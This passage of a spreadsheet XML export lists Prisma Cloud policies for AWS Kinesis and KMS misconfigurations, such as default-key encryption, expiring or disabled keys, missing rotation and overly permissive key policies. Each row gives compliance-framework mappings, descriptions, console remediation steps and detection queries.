        </is>
      </c>
      <c r="AK1978" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, GDPR, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, CSA CCM v4.0.12, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27001:2022, CSA CCM v3.0.1, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], jbrox - GDPR, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), SOC 2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, NIST CSF, FFIEC, ITSG-33, HITRUST CSF v.11.2.0, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, NIST SP 800-171 Revision 2, HITRUST CSF v9.3 [Deprecated], CIS Controls v7.1, ISO 27001:2013, CRI Profile v1.2.1, Copy of CIS Controls v8, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, ISO 27002:2022, jneytchev-fedramp-low, ISO 27001:2013, Fedramp (Low), ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v.11.2.0, NIST 800-171 Rev1, GDPR, Microsoft Cloud Security Benchmark v1, CIS Controls v7.1, PCI DSS v4.0, DORA, NIST CSF v2.0, NIST 800-171 Rev1, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, PCI DSS v4.0, CSA CCM v3.0.1, MLPS 2.0, NIST 800-53 Rev4, MAS TRM 2021, CyberSecurity Law of the People's Republic of China, jbrox - GDPR, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, CIS Controls v8.1, SOC 2, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, APRA (CPS 234) Information Security, NIST CSF, SOC 2, NIST 800-53 Rev4, NIST SP 800-171 Revision 3, CRI Profile v1.2.1, SOC 2, ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], GDPR, CRI Profile v2.0, NIST SP 800-171 Revision 3, Risk Management in Technology (RMiT), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, MAS TRM 2021, PIPEDA, MLPS 2.0 (Level 3), CIS Controls v8, NIST CSF, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CyberSecurity Law of the People's Republic of China, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, PCI DSS v4.0, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1979" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1979" s="2" t="inlineStr"/>
      <c r="D1979" t="inlineStr"/>
      <c r="E1979" t="inlineStr"/>
      <c r="F1979" t="inlineStr"/>
      <c r="G1979" t="b">
        <v>0</v>
      </c>
      <c r="H19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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1979" t="inlineStr">
        <is>
          <t>aws-kinesis</t>
        </is>
      </c>
      <c r="K1979" t="inlineStr">
        <is>
          <t>AWS Kinesis streams encryption using default KMS keys instead of Customer's Managed Master Keys</t>
        </is>
      </c>
      <c r="L1979" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1979" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1979" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1979" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1979" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1979" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1979" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1979" t="inlineStr"/>
      <c r="T1979" t="b">
        <v>0</v>
      </c>
      <c r="U1979" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1979" t="inlineStr">
        <is>
          <t>aws-kinesis-list-streams</t>
        </is>
      </c>
      <c r="W1979" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Kinesis streams which are encrypted with default KMS keys and not with Master Keys managed by Customer. It is a best practice to use customer managed Master Keys to encrypt your Amazon Kinesis streams data. It gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X1979" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Go to Kinesis Service
3. Select the reported Kinesis data stream for the corresponding region
4. Under Server-side encryption, Click on Edit
5. Choose Enabled
6. Under KMS master key, You can choose any KMS other than the default (Default) aws/kinesis
7. Click Save</t>
        </is>
      </c>
      <c r="Y1979" t="inlineStr"/>
      <c r="Z1979" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kinesis-list-streams' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '$.Y.keyMetadata.keyManager == AWS and $.Y.key.keyArn == $.X.keyId and $.X.encryptionType equals KMS'; show X;</t>
        </is>
      </c>
      <c r="AA1979" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1979" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1979" t="inlineStr">
        <is>
          <t>PC-AWS-KNS-175</t>
        </is>
      </c>
      <c r="AD1979" t="b">
        <v>1</v>
      </c>
      <c r="AE1979" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1979" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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79" t="inlineStr">
        <is>
          <t>5c537bb1-64f1-4e56-925e-7f0538800ff0</t>
        </is>
      </c>
      <c r="AI1979" t="inlineStr">
        <is>
          <t>5ab3a77d-30f9-46b3-8fd3-2690179abd11</t>
        </is>
      </c>
      <c r="AJ1979" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1979" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, PCI DSS v3.2.1, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, CSA CCM v.4.0.6, ISO/IEC 27002:2013, CSA CCM v4.0.12, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, MLPS 2.0 (Level 3), NIST SP 800-171 Revision 2, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NIST CSF, CIS Controls v8.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v4.0.12, MAS TRM 2021, TX-RAMP Level 2, CSA CCM v.4.0.6, NIST CSF v2.0, Insurance Regulatory And Development Authority Of India, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO/IEC 27017:2015, CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), MLPS 2.0, CyberSecurity Law of the People's Republic of China, MLPS 2.0 (Level 2), NIST 800-53 Rev4, FFIEC, CRI Profile v2.0, Copy of CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27017:2015, MAS TRM 2021, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 1, NIST SP 800-171 Revision 3, ITSG-33, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ITSG-33, ISO/IEC 27002:2013, MAS TRM 2021, ISO/IEC 27002:2013, NIST SP 800-172, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, DORA, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), HITRUST CSF v.9.6.0, ISO 27002:2022, CSA CCM v.4.0.1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1980" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1980" s="2" t="inlineStr"/>
      <c r="D1980" t="inlineStr"/>
      <c r="E1980" t="inlineStr"/>
      <c r="F1980" t="inlineStr"/>
      <c r="G1980" t="b">
        <v>0</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1980" t="inlineStr">
        <is>
          <t>aws-kms</t>
        </is>
      </c>
      <c r="K1980" t="inlineStr">
        <is>
          <t>AWS KMS customer managed external key expiring in 30 days or less</t>
        </is>
      </c>
      <c r="L1980" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1980" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1980" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1980" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1980" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1980" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R1980" t="inlineStr">
        <is>
          <t>SC-12</t>
        </is>
      </c>
      <c r="S1980" t="inlineStr"/>
      <c r="T1980" t="b">
        <v>0</v>
      </c>
      <c r="U1980" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1980" t="inlineStr">
        <is>
          <t>aws-kms-get-key-rotation-status</t>
        </is>
      </c>
      <c r="W1980" t="inlineStr">
        <is>
          <t>This policy identifies KMS customer managed external keys which are expiring in 30 days or less. As a best practice, it is recommended to reimport the same key material and specifying a new expiration date. If the key material expires, AWS KMS deletes the key material and the customer managed external key becomes unusable.</t>
        </is>
      </c>
      <c r="X1980" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Key Management Service (KMS) Dashboard
4. Click on Customer managed keys (Left Panel)
5. Click on reported KMS Customer managed key
6. Under 'Key material' section, Delete the existing key material before you reimport the key material by clicking on 'Delete key material'
7. Click on 'Upload key material'
8. Under 'Encrypted key material and import token' section, Reimport same encrypted key material and import token
9. Under 'Expiration option', Select 'Key material expires' and choose new expiration date in 'Key material expires at' date box
10. Click on 'Upload key material' button
NOTE: Deleting key material makes all data encrypted under the customer master key (CMK) unrecoverable unless you later import the same key material into the CMK. The CMK is not affected by this operation.</t>
        </is>
      </c>
      <c r="Y1980" t="inlineStr"/>
      <c r="Z1980" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kms-get-key-rotation-status' AND json.rule = 'keyMetadata.origin contains EXTERNAL and keyMetadata.keyManager contains CUSTOMER and keyMetadata.enabled is true and (_DateTime.ageInDays($.keyMetadata.validTo) &gt; -30)'</t>
        </is>
      </c>
      <c r="AA1980" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1980" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1980" t="inlineStr">
        <is>
          <t>PC-AWS-KMS-234</t>
        </is>
      </c>
      <c r="AD1980" t="b">
        <v>1</v>
      </c>
      <c r="AE1980" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1980" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>0ee9e44a-bc0f-4eaa-9c1d-7fc4dedc7b39</t>
        </is>
      </c>
      <c r="AI1980" t="inlineStr">
        <is>
          <t>eb8d4fb5-69e3-41c4-b155-563a1d744a72</t>
        </is>
      </c>
      <c r="AJ1980" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1980" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, PCI DSS v3.2.1, HITRUST CSF v.11.2.0, ISO 27002:2022, CSA CCM v4.0.12, PCI DSS v4.0, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, NIST CSF v2.0, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), PCI DSS v4.0, NIST CSF, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, HIPAA, ISO/IEC 27018:2019, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, PCI DSS v4.0, CIS Controls v7.1, MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CSA CCM v4.0.12, CRI Profile v2.0, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SOC 2, ISO/IEC 27001:2022, PCI DSS v4.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, TX-RAMP Level 1, CSA CCM v.4.0.1, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, PCI DSS v4.0, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1981" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1981" s="2" t="inlineStr"/>
      <c r="D1981" t="inlineStr"/>
      <c r="E1981" t="inlineStr"/>
      <c r="F1981" t="inlineStr"/>
      <c r="G1981" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1981" t="inlineStr">
        <is>
          <t>aws-kms</t>
        </is>
      </c>
      <c r="K1981" t="inlineStr">
        <is>
          <t>AWS KMS Key policy overly permissive</t>
        </is>
      </c>
      <c r="L1981" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1981" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1981" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1981" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1981" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1981" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1981" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1981" t="inlineStr"/>
      <c r="T1981" t="b">
        <v>0</v>
      </c>
      <c r="U1981" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1981" t="inlineStr">
        <is>
          <t>aws-kms-get-key-rotation-status</t>
        </is>
      </c>
      <c r="W1981" t="inlineStr">
        <is>
          <t>This policy identifies KMS Keys that have a key policy overly permissive. Key policies are the primary way to control access to customer master keys (CMKs) in AWS KMS. It is recommended to follow the principle of least privilege ensuring that KMS key policy does not have all the permissions to be able to complete a malicious action.
For more details:
https://docs.aws.amazon.com/kms/latest/developerguide/control-access-overview.html#overview-policy-elements</t>
        </is>
      </c>
      <c r="X1981" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from region drop-down on the top right corner, for which the alert is generated
3. Navigate to Key Management Service (KMS)
4. Click on 'Customer managed keys' (Left Panel)
5. Select reported KMS Customer managed key
6. Click on the 'Key policy' tab
7. Click on 'Edit',
Replace the 'Everyone' grantee (i.e. '*') from the Principal element value with an AWS account ID or an AWS account ARN.
OR
Add a Condition clause to the existing policy statement so that the KMS key is restricted.
8. Click on 'Save Changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-kms-key-policy-does-not-contain-wildcard-principal
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-kms-key-policy-does-not-contain-wildcard-principal</t>
        </is>
      </c>
      <c r="Y1981" t="inlineStr"/>
      <c r="Z1981" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and policies.default.Statement[?any(Principal.AWS contains * and Effect equal ignore case allow and Condition does not exist)] exists
{"category":"IAM","resourceTypes":["aws_kms_key"]}</t>
        </is>
      </c>
      <c r="AA1981" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1981" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1981" t="inlineStr">
        <is>
          <t>PC-AWS-KMS-649-CKV_AWS_33</t>
        </is>
      </c>
      <c r="AD1981" t="b">
        <v>1</v>
      </c>
      <c r="AE1981" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1981" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>2b68ad79-4c8b-48dd-8459-2d86203e862b</t>
        </is>
      </c>
      <c r="AI1981" t="inlineStr">
        <is>
          <t>1867d4c1-87ed-4ed1-a11e-f88a1ca9ead7</t>
        </is>
      </c>
      <c r="AJ1981" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1981" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" t="inlineStr">
        <is>
          <t>PCI DSS v3.2.1, GDPR, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], jbrox - GDPR, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, MTSBv2_AWS, Fedramp (Moderate), CIS v3.0.0 (AWS) Level 2, CIS v1.5.0 (AWS) - Level 2, MITRE ATT&amp;CK v6.3 [Deprecated], MAS TRM 2021, MITRE ATT&amp;CK v6.3 [Deprecated], CIS Controls v8.1, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, jneytchev-fedramp-low, ISO 27001:2013, Fedramp (Low), CSA CCM v3.0.1, CIS Controls v7.1, GDPR, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, DORA, NIST 800-171 Rev1, ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.2.0 (AWS), MLPS 2.0, NIST 800-53 Rev4, MAS TRM 2021, SOC 2, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, CIS v2.0.0 (AWS) - Level 2, SOC 2, CIS Controls v8, TX-RAMP Level 1, NIST SP 800-171 Revision 3, SOC 2, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, MAS TRM 2021, HITRUST CSF v.9.6.0, CIS v1.4.0 (AWS), Copy of CIS Controls v8, NIST SP 800-172, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, CCPA 2018, PIPEDA, MLPS 2.0 (Level 3), Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev 5, CIS v1.3.0 (AWS)</t>
        </is>
      </c>
      <c r="B1982" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1982" s="2" t="inlineStr"/>
      <c r="D1982" t="inlineStr"/>
      <c r="E1982" t="inlineStr"/>
      <c r="F1982" t="inlineStr"/>
      <c r="G1982" t="b">
        <v>1</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1982" t="inlineStr">
        <is>
          <t>aws-kms</t>
        </is>
      </c>
      <c r="K1982" t="inlineStr">
        <is>
          <t>AWS Customer Master Key (CMK) rotation is not enabled</t>
        </is>
      </c>
      <c r="L1982" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1982" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1982" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1982" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1982" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1982" t="inlineStr">
        <is>
          <t>CIS Control 5</t>
        </is>
      </c>
      <c r="R1982" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="S1982" t="inlineStr">
        <is>
          <t>CIS,PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T1982" t="b">
        <v>1</v>
      </c>
      <c r="U1982" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1982" t="inlineStr">
        <is>
          <t>aws-kms-get-key-rotation-status</t>
        </is>
      </c>
      <c r="W1982" t="inlineStr">
        <is>
          <t>This policy identifies Customer Master Keys (CMKs) that are not enabled with key rotation. AWS KMS (Key Management Service) allows customers to create master keys to encrypt sensitive data in different services. As a security best practice, it is important to rotate the keys periodically so that if the keys are compromised, the data in the underlying service is still secure with the new keys.</t>
        </is>
      </c>
      <c r="X1982" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. In the console, select the specific region from region drop-down on the top right corner, for which the alert is generated
3. Navigate to Key Management Service (KMS)
4. Click on 'Customer managed keys' (Left Panel)
5. Select reported KMS Customer managed key
6. Under the 'Key Rotation' tab, Enable 'Automatically rotate this CMK every year'
7. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-8
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/logging-8</t>
        </is>
      </c>
      <c r="Y1982" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'kms:EnableKeyRotation' permission. Successful execution will enable the key rotation for the respective Customer Master Key (CMK).",
'impact': 'Enable key rotation for the respective Customer Master Key',
'cliScriptTemplate': 'aws kms enable-key-rotation --key-id $resourceId --region $region'</t>
        </is>
      </c>
      <c r="Z1982" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and keyMetadata.keyManager equals CUSTOMER and keyMetadata.origin equals AWS_KMS and (rotation_status.keyRotationEnabled is false or rotation_status.keyRotationEnabled equals "null") and keyMetadata.customerMasterKeySpec equals SYMMETRIC_DEFAULT
{"category":"Logging","resourceTypes":["aws_kms_key"]}</t>
        </is>
      </c>
      <c r="AA1982" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1982" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1982" t="inlineStr">
        <is>
          <t>PC-AWS-KMS-20-CKV_AWS_7</t>
        </is>
      </c>
      <c r="AD1982" t="b">
        <v>1</v>
      </c>
      <c r="AE1982" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1982" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>497f7e2c-b702-47c7-9a07-f0f6404ac896</t>
        </is>
      </c>
      <c r="AI1982" t="inlineStr">
        <is>
          <t>497f7e2c-b702-47c7-9a07-f0f6404ac896</t>
        </is>
      </c>
      <c r="AJ1982" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1982" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" t="inlineStr"/>
      <c r="B1983" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1983" s="2" t="inlineStr"/>
      <c r="D1983" t="inlineStr"/>
      <c r="E1983" t="inlineStr"/>
      <c r="F1983" t="inlineStr"/>
      <c r="G1983" t="b">
        <v>1</v>
      </c>
      <c r="H19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83" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1983" t="inlineStr">
        <is>
          <t>aws-kms</t>
        </is>
      </c>
      <c r="K1983" t="inlineStr">
        <is>
          <t>AWS KMS Customer Managed Key (CMK) is disabled</t>
        </is>
      </c>
      <c r="L1983" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1983" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1983" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1983" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1983" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1983" t="inlineStr"/>
      <c r="R1983" t="inlineStr"/>
      <c r="S1983" t="inlineStr"/>
      <c r="T1983" t="b">
        <v>0</v>
      </c>
      <c r="U1983" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1983" t="inlineStr">
        <is>
          <t>aws-kms-get-key-rotation-status</t>
        </is>
      </c>
      <c r="W1983" t="inlineStr">
        <is>
          <t>This policy identifies the AWS KMS Customer Managed Key (CMK) that is disabled.
